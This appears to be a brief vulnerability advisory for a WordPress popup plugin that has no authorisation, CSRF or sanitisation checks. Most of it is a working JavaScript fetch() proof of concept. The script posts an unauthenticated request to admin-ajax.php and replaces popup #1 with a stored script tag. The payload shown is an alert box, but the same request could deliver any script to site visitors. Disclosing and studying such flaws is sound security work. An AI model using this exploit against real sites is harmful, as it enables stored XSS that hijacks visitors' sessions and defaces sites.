The plugin does not have authorisation and CSRF check when creating/updating popups, and is missing sanitisation as well as escaping, which could allow unauthenticated attackers to create arbitrary popups and add Stored XSS payloads as well
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=pm_save_data&form_action=update&form_id=1&form_name=vulnerability&form_data={"form_action":"undefined","popup_template":"text","popup_template_style":"","popup_location":"modal-popup","popup_timer":"0","popup_trigger":"timer","popup_entry_animation":"bounce","popup_exit_animation":"bounce","popup_title":"XSS","popup_disclaimer":"Try XSS","popup_text":"vulnerable"}&popup_html=<script>alert("XSS");</script>',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
This exploit script replaces the html of popup #1 with a script tag.